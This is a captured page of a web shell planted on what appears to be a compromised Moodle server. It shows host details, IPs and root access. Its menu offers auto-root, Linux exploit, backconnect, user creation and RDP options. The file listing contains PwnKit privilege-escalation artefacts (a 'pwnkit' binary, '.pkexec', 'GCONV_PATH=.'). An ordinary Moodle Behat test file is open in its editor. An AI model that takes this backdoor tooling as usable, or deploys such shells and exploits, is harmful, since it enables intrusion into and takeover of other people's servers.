Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
report /
log /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
filter_log.feature
3.66
KB
-rwxrwxrwx
filter_log_actions.feature
3.44
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
user_log.feature
3.21
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filter_log.feature
@report @report_log Feature: In a report, admin can filter log data In order to filter log data As an admin I need to log in with different user and go to log and apply filter Background: Given the following "courses" exist: | fullname | shortname | category | groupmode | | Course 1 | C1 | 0 | 1 | And the following "users" exist: | username | firstname | lastname | email | idnumber | middlename | alternatename | firstnamephonetic | lastnamephonetic | | teacher1 | Teacher | One | teacher1@example.com | t1 | | fred | | | | student1 | Grainne | Beauchamp | student1@example.com | s1 | Ann | Jill | Gronya | Beecham | And the following "course enrolments" exist: | user | course | role | | admin | C1 | editingteacher | | student1 | C1 | student | And the following config values are set as admin: | fullnamedisplay | firstname | | alternativefullnameformat | middlename, alternatename, firstname, lastname | And I log in as "admin" Scenario: Filter log report for standard and legacy log reader Given I navigate to "Plugins > Logging > Manage log stores" in site administration And I click on "Enable" "link" in the "Legacy log" "table_row" And the following config values are set as admin: | loglegacy | 1 | logstore_legacy | And I follow "Home" And I am on "Course 1" course homepage And I navigate to course participants And I follow "Ann, Jill, Grainne, Beauchamp" And I click on "Log in as" "link" And I press "Continue" And I log out And I log in as "admin" When I navigate to "Reports > Logs" in site administration And I set the field "id" to "Acceptance test site (Site)" And I set the field "user" to "All participants" And I set the field "logreader" to "Standard log" And I press "Get these logs" Then I should see "User logged in as another user" And I set the field "logreader" to "Legacy log" And I press "Get these logs" And I should see "user login" And I should not see "Nothing to display" Scenario: Filter log report for standard log reader Given I am on "Course 1" course homepage And I navigate to course participants And I follow "Ann, Jill, Grainne, Beauchamp" And I click on "Log in as" "link" And I press "Continue" And I log out And I log in as "admin" When I navigate to "Reports > Logs" in site administration And I set the field "id" to "Acceptance test site (Site)" And I set the field "user" to "All participants" And I press "Get these logs" Then I should see "User logged in as another user" Scenario: Filter log report for legacy log reader Given I navigate to "Plugins > Logging > Manage log stores" in site administration And I click on "Enable" "link" in the "Legacy log" "table_row" And I click on "Disable" "link" in the "Standard log" "table_row" And the following config values are set as admin: | loglegacy | 1 | logstore_legacy | And I follow "Home" And I am on "Course 1" course homepage And I follow "Home" And I am on "Course 1" course homepage And I navigate to course participants And I follow "Ann, Jill, Grainne, Beauchamp" And I click on "Log in as" "link" And I press "Continue" And I log out And I log in as "admin" When I navigate to "Reports > Logs" in site administration And I set the field "id" to "Acceptance test site (Site)" And I set the field "user" to "All participants" And I press "Get these logs" Then I should see "user login"
Close